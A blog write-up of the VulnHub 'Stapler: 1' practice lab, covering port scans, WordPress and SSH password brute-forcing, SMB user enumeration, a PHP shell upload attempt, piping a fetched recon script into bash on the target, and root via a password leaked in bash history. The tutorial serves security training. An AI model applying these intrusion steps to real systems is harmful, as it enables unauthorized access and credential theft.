6 July 2022

Pentesting Fun Stuff

following the cyber security path…

Stapler: 1

This is another challenge from my OSCP list. It is a challenge from 2016 and this is from its description:

+---------------------------------------------------------+
|                                                         |
|                                  __..--''\              |
|                          __..--''         \             |
|                  __..--''          __..--''             |
|          __..--''          __..--''       |             |
|          \ o        __..--''____....----""              |
|           \__..--''\                                    |
|           |         \                                   |
|          +----------------------------------+           |
|          +----------------------------------+           |
|                                                         |
+- - - - - - - - - - - - - -|- - - - - - - - - - - - - - -+
|   Name: Stapler           |          IP: DHCP           |
|   Date: 2016-June-08      |        Goal: Get Root!      |
| Author: g0tmi1k           | Difficultly: ??? ;)         |
+- - - - - - - - - - - - - -|- - - - - - - - - - - - - - -+
|                                                         |
| + Average beginner/intermediate VM, only a few twists   |
|   + May find it easy/hard (depends on YOUR background)  |
|   + ...also which way you attack the box                |
|                                                         |
| + It SHOULD work on both VMware and Virtualbox          |
|   + REBOOT the VM if you CHANGE network modes           |
|   + Fusion users, you'll need to retry when importing   |
|                                                         |
| + There are multiple methods to-do this machine         |
|   + At least two (2) paths to get a limited shell       |
|   + At least three (3) ways to get a root access        |
|                                                         |
| + Made for BsidesLondon 2016                            |
|   + Slides: https://download.vulnhub.com/media/stapler/ |
|                                                         |
| + Thanks g0tmi1k, nullmode, rasta_mouse & superkojiman  |
|   + ...and shout-outs to the VulnHub-CTF Team =)        |
|                                                         |
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - -+
|                                                         |
|       --[[~~Enjoy. Have fun. Happy Hacking.~~]]--       |
|                                                         |
+---------------------------------------------------------+

Let’s start…..

Recon

What ports are open and what services are running?

root@redteam:~# nmap -n -v -T4 -sS -sV -sC -p- 192.168.50.136
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-29 20:08 CEST
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Nmap scan report for stapler (192.168.50.136)
Host is up (0.00040s latency).
Not shown: 65523 filtered ports
PORT      STATE  SERVICE     VERSION
20/tcp    closed ftp-data
21/tcp    open   ftp         vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 550 Permission denied.
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.50.135
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp    open   ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
|   256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
|_  256 6d:01:b7:73:ac:b0:93:6f:fa:b9:89:e6:ae:3c:ab:d3 (ED25519)
53/tcp    open   domain      dnsmasq 2.75
| dns-nsid: 
|   id.server: AMS
|_  bind.version: dnsmasq-2.75
80/tcp    open   http        PHP cli server 5.5 or later
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
123/tcp   closed ntp
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
666/tcp   open   doom?
| fingerprint-strings: 
|   NULL: 
|     message2.jpgUT 
|     QWux
|     "DL[E
|     #;3[
|     \xf6
|     u([r
|     qYQq
|     Y_?n2
|     3&M~{
|     9-a)T
|     L}AJ
|_    .npy.9
3306/tcp  open   mysql       MySQL 5.7.12-0ubuntu1
| mysql-info: 
|   Protocol: 10
|   Version: 5.7.12-0ubuntu1
|   Thread ID: 7
|   Capabilities flags: 63487
|   Some Capabilities: Support41Auth, Speaks41ProtocolOld, SupportsTransactions, LongPassword, ConnectWithDatabase, IgnoreSigpipes, InteractiveClient, SupportsLoadDataLocal, SupportsCompression, DontAllowDatabaseTableColumn, LongColumnFlag, Speaks41ProtocolNew, FoundRows, IgnoreSpaceBeforeParenthesis, ODBCClient, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: g\\x0B\x16M\x1C%\x1F(5\x11 DZ\x01?\x1Eq\x7FI
|_  Auth Plugin Name: 88
12380/tcp open   http        Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:BD:3B:EA (VMware)
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h39m59s, deviation: 34m37s, median: 1h59m58s
| nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   RED<00>              Flags: <unique><active>
|   RED<03>              Flags: <unique><active>
|   RED<20>              Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|_  WORKGROUP<1e>        Flags: <group><active>
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
|   Computer name: red
|   NetBIOS computer name: RED\x00
|   Domain name: \x00
|   FQDN: red
|_  System time: 2019-05-29T21:09:48+01:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2019-05-29 22:09:48
|_  start_date: N/A

NSE: Script Post-scanning.
Initiating NSE at 20:10
Completed NSE at 20:10, 0.00s elapsed
Initiating NSE at 20:10
Completed NSE at 20:10, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 131.64 seconds
           Raw packets sent: 131126 (5.770MB) | Rcvd: 80 (3.372KB)

That’s a long list of ports and services. At first glance there is an FTP server with anonymous login enabled.
There are also 2 webservers, a samba server and a MySQL server running.
Finally there is also something returning output on port 666.

If you can’t remember the default service running on a port, you can check a list on Linux for the specific port/service.
As an example, I’m going to check out port 3306.

root@redteam:~# cat /etc/services | grep 3306
mysql		3306/tcp
mysql		3306/udp

FTP

Anonymous login is enable, so let’s see what is inside.

root@redteam:~# ftp
ftp> open red
Connected to red.
220-
220-|-----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|-----------------------------------------------------------------------------------------|
220-
220 
Name (red:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> 

Collected a possible username: harry
But what banner?

root@redteam:~# ssh 192.168.50.136
The authenticity of host '192.168.50.136 (192.168.50.136)' can't be established.
ECDSA key fingerprint is SHA256:WuY26BwbaoIOawwEIZRaZGve4JZFaRo7iSvLNoCwyfA.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.50.136' (ECDSA) to the list of known hosts.
-----------------------------------------------------------------
~          Barry, don't forget to put a message here           ~
-----------------------------------------------------------------

No password yet, so moving on.

ftp> ls -lah
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Jun 04  2016 .
drwxr-xr-x    2 0        0            4096 Jun 04  2016 ..
-rw-r--r--    1 0        0             107 Jun 03  2016 note
226 Directory send OK.
ftp> get note
local: note remote: note
200 Switching to Binary mode.
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note (107 bytes).
226 Transfer complete.
107 bytes received in 0.00 secs (105.9758 kB/s)
root@redteam:~# cat note
Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.

Two more possible usernames: elly and john.
The usernames, I put into a list for later use.

root@redteam:~# echo -e "harry\nelly\njohn" > usernames.txt

Port 666

When connecting with port 666 it returns unreadable output which I redirect into a file.

root@redteam:~# nc -v red 666 | tee -a output
root@redteam:~# file output 
output: Zip archive data, at least v2.0 to extract

A zip file.

root@redteam:~# unzip output
Archive:  output
  inflating: message2.jpg

Another possible username. The message about segmentation fault could suggest a buffer overflow.

root@redteam:~# exiftool message2.jpg 
ExifTool Version Number         : 11.16
File Name                       : message2.jpg
Directory                       : .
File Size                       : 13 kB
File Modification Date/Time     : 2016:06:03 17:03:07+02:00
File Access Date/Time           : 2019:05:29 20:54:52+02:00
File Inode Change Date/Time     : 2019:05:29 20:53:20+02:00
File Permissions                : rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : None
X Resolution                    : 72
Y Resolution                    : 72
Current IPTC Digest             : 020ab2da2a37c332c141ebf819e37e6d
Contact                         : If you are reading this, you should get a cookie!
Application Record Version      : 4
IPTC Digest                     : d41d8cd98f00b204e9800998ecf8427e
Image Width                     : 364
Image Height                    : 77
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:4:4 (1 1)
Image Size                      : 364x77
Megapixels                      : 0.028

It looks like there is some useful meta-data inside this picture. Getting a cookie? Ok.

Webservers

I thought I would get a cookie when browsing the website at port 12380, but no cookie.
There are some comments in the source page.

title>Tim, we need to-do better next year for Initech</title>
<!-- A message from the head of our HR department, Zoe, if you are looking at this, we want to hire you! -->

More usernames for the file.
My directory brute force attempts came up empty. So maybe Nikto has better luck.

root@redteam:~# nikto -h http://192.168.50.136
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.50.136
+ Target Hostname:    192.168.50.136
+ Target Port:        80
+ Start Time:         2019-05-29 22:17:40 (GMT2)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3093: /.bashrc: User home dir was found with a shell rc file. This may reveal file and path information.
+ OSVDB-3093: /.profile: User home dir with a shell profile was found. May reveal directory information and system configuration.
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated:  20 error(s) and 5 item(s) reported on remote host
+ End Time:           2019-05-29 22:18:00 (GMT2) (20 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@redteam:~# nikto -h 192.168.50.136:12380
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.50.136
+ Target Hostname:    192.168.50.136
+ Target Port:        12380
---------------------------------------------------------------------------
+ SSL Info:        Subject:  /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
                   Ciphers:  ECDHE-RSA-AES256-GCM-SHA384
                   Issuer:   /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
+ Start Time:         2019-05-29 22:17:55 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'dave' found, with contents: Soemthing doesn't look right here
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The site uses SSL and Expect-CT header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Hostname '192.168.50.136' does not match certificate's names: Red.Initech
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 8071 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time:           2019-05-29 22:20:59 (GMT2) (184 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

These scans look promising. In the first one there is a file found that resides in the home folder of a user. So maybe LFI possibilities.
The second scan shows the existence of a robots.txt file, which has 2 entries. Also, there is a phpmyadmin page and there is an SSL certificate with some useful information.

It seems I checked out HTTP, but forgot HTTPS. When browsing to /admin112233/ I get a pop-up.

The blogblog takes me to a wordpress site and I navigate to the wp-admin page.

So there is a john user, but the password is just not correct. Time for wpscan.
With the use of wpscan in this case it’s important to note that the option –disable-tls-checks is very important.
Without the option the scan will abort because of the certificate.

The scan says the current WordPress runs on version 4.2.1. And this version has some vulnerabilities.
I also got some valid credentials. So that was something I wanted to investigate first, as it’s relatively easy.

[i] User(s) Identified:

[+] john
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] barry
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] elly
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] peter
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] heather
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] garry
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] harry
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] scott
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] tim
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] kathy
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] Performing password attack on Xmlrpc Multicall against 1 user/s
[SUCCESS] - john / incorrect                                                                                                                                                                                      
All Found                                                                                                                                                                                                         
Progress Time: 00:05:32 <==========                                                                                                                                           > (155 / 1999)  7.75%  ETA: ??:??:??

[i] Valid Combinations Found:
[SUCCESS] - garry / football                                                                                                                                                                                      
[SUCCESS] - harry / monkey                                                                                                                                                                                        
[SUCCESS] - scott / cookie                                                                                                                                                                                        
[SUCCESS] - tim / thumb                                                                                                                                                                                           
[SUCCESS] - kathy / coolgirl                                                                                                                                                                                      
[SUCCESS] - john / incorrect

For brute forcing the passwords I used a password list from SecLists.
I tried Harry first, but this user has no useful rights. So I try Tim next.

Tim has the same rights, so does Kathy. They can’t do anything without it first needs to be approved by the admin…….and it looks like that is John.

To get a reverse shell there are several ways to get this done. But in this case it wasn’t that simple. What did I try:

  • altering the 404 page by replacing the php code with the code from pentestmonkey. This didn’t work because the files weren’t writable.

  • installing a plugin. This also did not work, because I needed to give the FTP credentials.

After some time I decided to move on to another service, because there was much more to go on. Maybe I would find something useful along the way.

SMB

Because connecting to the MySQL server needs a password I go for the SMB server.

root@redteam:~# smbclient -L 192.168.50.136
Enter WORKGROUP\root's password: 

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	kathy           Disk      Fred, What are we doing here?
	tmp             Disk      All temporary files should be stored here
	IPC$            IPC       IPC Service (red server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	WORKGROUP            RED
root@redteam:~/tmp/backup# smbmap -H 192.168.50.136 -P 139
[+] Finding open SMB ports....
[+] Guest RPC session established on 192.168.50.136...
[+] IP: 192.168.50.136:139	Name: red                                               
	Disk                                                  	Permissions
	----                                                  	-----------
	print$                                            	NO ACCESS
	kathy                                             	READ ONLY
	tmp                                               	READ, WRITE
	IPC$                                              	NO ACCESS

Another option that Kali has to enumerate an SMB server is a perl script named enum4linux. This script has many option, but for now I’m going to enumerate users via RID cycling.

S-1-22-1-1001 Unix User\RNunemaker (Local User)
S-1-22-1-1002 Unix User\ETollefson (Local User)
S-1-22-1-1003 Unix User\DSwanger (Local User)
S-1-22-1-1004 Unix User\AParnell (Local User)
S-1-22-1-1005 Unix User\SHayslett (Local User)
S-1-22-1-1006 Unix User\MBassin (Local User)
S-1-22-1-1007 Unix User\JBare (Local User)
S-1-22-1-1008 Unix User\LSolum (Local User)
S-1-22-1-1009 Unix User\IChadwick (Local User)
S-1-22-1-1010 Unix User\MFrei (Local User)
S-1-22-1-1011 Unix User\SStroud (Local User)
S-1-22-1-1012 Unix User\CCeaser (Local User)
S-1-22-1-1013 Unix User\JKanode (Local User)
S-1-22-1-1014 Unix User\CJoo (Local User)
S-1-22-1-1015 Unix User\Eeth (Local User)
S-1-22-1-1016 Unix User\LSolum2 (Local User)
S-1-22-1-1017 Unix User\JLipps (Local User)
S-1-22-1-1018 Unix User\jamie (Local User)
S-1-22-1-1019 Unix User\Sam (Local User)
S-1-22-1-1020 Unix User\Drew (Local User)
S-1-22-1-1021 Unix User\jess (Local User)
S-1-22-1-1022 Unix User\SHAY (Local User)
S-1-22-1-1023 Unix User\Taylor (Local User)
S-1-22-1-1024 Unix User\mel (Local User)
S-1-22-1-1025 Unix User\kai (Local User)
S-1-22-1-1026 Unix User\zoe (Local User)
S-1-22-1-1027 Unix User\NATHAN (Local User)
S-1-22-1-1028 Unix User\www (Local User)
S-1-22-1-1029 Unix User\elly (Local User)

Now to filter out the usernames and store them in the usernames.txt file.

root@redteam:~# cat rid.list | cut -d '\' -f2 | awk '{print $1}' | tr [:upper:] [:lower:] >> usernames.txt

After checking the list, it seems that I have duplicates.

root@redteam:~# cat usernames.txt | sort -u > usernames.list

From the scans it looks like the tmp share is writable, but let’s try the Kathy share first.

root@redteam:~# smbclient \\\\192.168.50.136\\kathy
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: \> ls -lah
NT_STATUS_NO_SUCH_FILE listing \-lah
smb: \> ls
  .                                   D        0  Fri Jun  3 18:52:52 2016
  ..                                  D        0  Mon Jun  6 23:39:56 2016
  kathy_stuff                         D        0  Sun Jun  5 17:02:27 2016
  backup                              D        0  Sun Jun  5 17:04:14 2016

		19478204 blocks of size 1024. 16396568 blocks available

From this share I get 3 files

-rw-r--r--  1 root root   64 May 29 21:29 todo-list.txt
-rw-r--r--  1 root root 5.9K May 29 21:29 vsftpd.conf
-rw-r--r--  1 root root 6.1M May 29 21:30 wordpress-4.tar.gz
root@redteam:~/tmp# cat todo-list.txt
I'm making sure to backup anything important for Initech, Kathy
listen=YES
listen_ipv6=NO
anonymous_enable=YES
anon_root=/var/ftp/anonymous
local_enable=YES
dirmessage_enable=YES
use_localtime=YES
xferlog_enable=YES
connect_from_port_20=YES
banner_file=/etc/vsftpd.banner
chroot_local_user=YES
userlist_enable=YES
local_root=/etc
secure_chroot_dir=/var/run/vsftpd/empty
pam_service_name=vsftpd
rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem
rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key
ssl_enable=NO
pasv_enable=no

Now for the tmp share.

root@redteam:~/tmp/backup# smbclient \\\\192.168.50.136\\tmp
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed May 29 23:39:18 2019
  ..                                  D        0  Mon Jun  6 23:39:56 2016
  ls                                  N      274  Sun Jun  5 17:32:58 2016

		19478204 blocks of size 1024. 16396552 blocks available
root@redteam:~/tmp/backup# cat ls
.:
total 12.0K
drwxrwxrwt  2 root root 4.0K Jun  5 16:32 .
drwxr-xr-x 16 root root 4.0K Jun  3 22:06 ..
-rw-r--r--  1 root root    0 Jun  5 16:32 ls
drwx------  3 root root 4.0K Jun  5 15:32 systemd-private-df2bff9b90164a2eadc490c0b8f76087-systemd-timesyncd.service-vFKoxJ

An ASCII file with a listing of a filesystem. From here I can’t really do anything with it.

UDP

Because of the use of FTP in this challenge I decided to check another angle.

root@redteam:~# cat /etc/services | grep ftp
ftp-data	20/tcp
ftp		21/tcp
tftp		69/udp
root@redteam:~# nmap -n -T4 -sU -sV -sC -p 69 192.168.50.136
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-31 10:59 CEST
Stats: 0:00:21 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 0.00% done
Nmap scan report for 192.168.50.136
Host is up (0.00024s latency).

PORT   STATE         SERVICE VERSION
69/udp open|filtered tftp
MAC Address: 00:0C:29:BD:3B:EA (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 99.99 seconds

Nmap is not sure. We can try it anyway.

root@redteam:~/stapler# tftp 192.168.50.136
tftp> status
Connected to 192.168.50.136.
Mode: netascii Verbose: off Tracing: off
Rexmt-interval: 5 seconds, Max-timeout: 25 seconds

Cool. Let’s see if we can upload a file.

tftp> verbose on
Verbose mode on.
tftp> mode
Using netascii mode to transfer files.
tftp> put shell.php
putting shell.php to 192.168.50.136:shell.php [netascii]
Sent 5688 bytes in 0.0 seconds [inf bits/sec]

Unfortunately the script wasn’t anywhere to be found.

SSH

I really don’t like brute forcing, mostly because it can take a very long time and it is very noisy.
But in this case I give it a shot.

root@redteam:~/stapler# hydra -L rid.list -P rid.list 192.168.50.136 ssh
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-05-31 11:38:42
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 841 login tries (l:29/p:29), ~53 tries per task
[DATA] attacking ssh://192.168.50.136:22/
[22][ssh] host: 192.168.50.136   login: SHayslett   password: SHayslett

And this is why I don’t like brute forcing. Before I found these credentials I tried several lists from SecLists first and then the rockyou list.
When that didn’t work I almost gave up on this option and only as a last attempt I used the info I found during this pentest, which was more luck than wisdom.

EoP

SHayslett@red:~$ ls -lah /home
total 128K
drwxr-xr-x 32 root       root       4.0K Jun  4  2016 .
drwxr-xr-x 22 root       root       4.0K Jun  7  2016 ..
drwxr-xr-x  2 AParnell   AParnell   4.0K Jun  5  2016 AParnell
drwxr-xr-x  2 CCeaser    CCeaser    4.0K Jun  5  2016 CCeaser
drwxr-xr-x  2 CJoo       CJoo       4.0K Jun  5  2016 CJoo
drwxr-xr-x  2 Drew       Drew       4.0K Jun  5  2016 Drew
drwxr-xr-x  2 DSwanger   DSwanger   4.0K Jun  5  2016 DSwanger
drwxr-xr-x  2 Eeth       Eeth       4.0K Jun  5  2016 Eeth
drwxr-xr-x  2 elly       elly       4.0K Jun  5  2016 elly
drwxr-xr-x  2 ETollefson ETollefson 4.0K Jun  5  2016 ETollefson
drwxr-xr-x  2 IChadwick  IChadwick  4.0K Jun  5  2016 IChadwick
drwxr-xr-x  2 jamie      jamie      4.0K Jun  5  2016 jamie
drwxr-xr-x  2 JBare      JBare      4.0K Jun  5  2016 JBare
drwxr-xr-x  2 jess       jess       4.0K Jun  5  2016 jess
drwxr-xr-x  2 JKanode    JKanode    4.0K Jun  5  2016 JKanode
drwxr-xr-x  2 JLipps     JLipps     4.0K Jun  5  2016 JLipps
drwxr-xr-x  2 kai        kai        4.0K Jun  5  2016 kai
drwxr-xr-x  2 LSolum     LSolum     4.0K Jun  5  2016 LSolum
drwxr-xr-x  2 LSolum2    LSolum2    4.0K Jun  5  2016 LSolum2
drwxr-xr-x  2 MBassin    MBassin    4.0K Jun  5  2016 MBassin
drwxr-xr-x  2 mel        mel        4.0K Jun  5  2016 mel
drwxr-xr-x  2 MFrei      MFrei      4.0K Jun  5  2016 MFrei
drwxr-xr-x  2 NATHAN     NATHAN     4.0K Jun  5  2016 NATHAN
drwxr-xr-x  3 peter      peter      4.0K Jun  3  2016 peter
drwxr-xr-x  2 RNunemaker RNunemaker 4.0K Jun  5  2016 RNunemaker
drwxr-xr-x  2 Sam        Sam        4.0K Jun  5  2016 Sam
drwxr-xr-x  2 SHAY       SHAY       4.0K Jun  5  2016 SHAY
drwxr-xr-x  3 SHayslett  SHayslett  4.0K May 31 10:39 SHayslett
drwxr-xr-x  2 SStroud    SStroud    4.0K Jun  5  2016 SStroud
drwxr-xr-x  2 Taylor     Taylor     4.0K Jun  5  2016 Taylor
drwxrwxrwx  2 www        www        4.0K Jun  5  2016 www
drwxr-xr-x  2 zoe        zoe        4.0K Jun  5  2016 zoe

Let’s start with some basic enumeration.
Starting a python http server on port 80, while in the folder containing a recon bash script.

root@redteam:/opt/tools/shells/LinEnum# server 80
Serving HTTP on 0.0.0.0 port 80 ...

Then curling it on the remote system and piping it to bash.
This way the script will run on the remote system without the need to transfer the file first.

...[SNIP]...

[-] It looks like we have some admin users:
uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)
uid=1000(peter) gid=1000(peter) groups=1000(peter),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)

...[SNIP]...

[-] Accounts that have recently used sudo:
/home/peter/.sudo_as_admin_successful

...[SNIP]...

/home/JKanode/.bash_history
id
whoami
ls -lah
pwd
ps aux
sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
sshpass -p JZQuyIN5 peter@localhost
ps -ef
top
kill -9 3747
exit

It looks like Peter is the user of interest. And from the history of JKanode it looks like I have his password.

JKanode@red:~$ su peter
Password: 

This is the Z Shell configuration function for new users,
zsh-newuser-install.
You are seeing this message because you have no zsh startup files
(the files .zshenv, .zprofile, .zshrc, .zlogin in the directory
~).  This function can help you with a few settings that should
make your use of the shell easier.

You can:

(q)  Quit and do nothing.  The function will be run again next time.

(0)  Exit, creating the file ~/.zshrc containing just a comment.
     That will prevent this function being run again.

(1)  Continue to the main menu.

(2)  Populate your ~/.zshrc with the configuration recommended
     by the system administrator and exit (you will need to edit
     the file by hand, if so desired).

--- Type one of the keys in parentheses --- (
Aborting.
The function will be run again next time.  To prevent this, execute:
  touch ~/.zshrc
red% pwd
/home/JKanode
red% cd
red% pwd
/home/peter
red% ls -lah
total 72K
drwxr-xr-x  3 peter peter 4.0K Jun  3  2016 .
drwxr-xr-x 32 root  root  4.0K Jun  4  2016 ..
-rw-------  1 peter peter    1 Jun  5  2016 .bash_history
-rw-r--r--  1 peter peter  220 Jun  3  2016 .bash_logout
-rw-r--r--  1 peter peter 3.7K Jun  3  2016 .bashrc
drwx------  2 peter peter 4.0K Jun  6  2016 .cache
-rw-r--r--  1 peter peter  675 Jun  3  2016 .profile
-rw-r--r--  1 peter peter    0 Jun  3  2016 .sudo_as_admin_successful
-rw-------  1 peter peter  577 Jun  3  2016 .viminfo
-rw-rw-r--  1 peter peter  39K Jun  3  2016 .zcompdump
red% sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for peter: 
Matching Defaults entries for peter on red:
    lecture=always, env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User peter may run the following commands on red:
    (ALL : ALL) ALL
red% 

Well….that’s nice.

red% sudo -i
➜  ~ pwd
/root
➜  ~ id
uid=0(root) gid=0(root) groups=0(root)
➜  ~ ls -lah
total 208K
drwx------  4 root root 4.0K May 31 11:19 .
drwxr-xr-x 22 root root 4.0K Jun  7  2016 ..
-rw-------  1 root root    1 Jun  5  2016 .bash_history
-rw-r--r--  1 root root 3.1K Oct 22  2015 .bashrc
-rwxr-xr-x  1 root root 1.1K Jun  5  2016 fix-wordpress.sh
-rw-r--r--  1 root root  463 Jun  5  2016 flag.txt
-rw-r--r--  1 root root  345 Jun  5  2016 issue
-rw-r--r--  1 root root   50 Jun  3  2016 .my.cnf
-rw-------  1 root root    1 Jun  5  2016 .mysql_history
drwxr-xr-x 11 root root 4.0K Jun  3  2016 .oh-my-zsh
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rwxr-xr-x  1 root root  103 Jun  5  2016 python.sh
-rw-------  1 root root 1.0K Jun  5  2016 .rnd
drwxr-xr-x  2 root root 4.0K Jun  4  2016 .vim
-rw-------  1 root root    1 Jun  5  2016 .viminfo
-rw-r--r--  1 root root  54K Jun  5  2016 wordpress.sql
-rw-r--r--  1 root root  39K Jun  3  2016 .zcompdump
-rw-r--r--  1 root root  39K Jun  3  2016 .zcompdump-red-5.1.1
-rw-------  1 root root   39 Jun  5  2016 .zsh_history
-rw-r--r--  1 root root 2.8K Jun  3  2016 .zshrc
-rw-r--r--  1 root root   17 Jun  3  2016 .zsh-update
➜  ~ cat flag.txt
~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
                          .-'''''-.
                          |'-----'|
                          |-.....-|
                          |       |
                          |       |
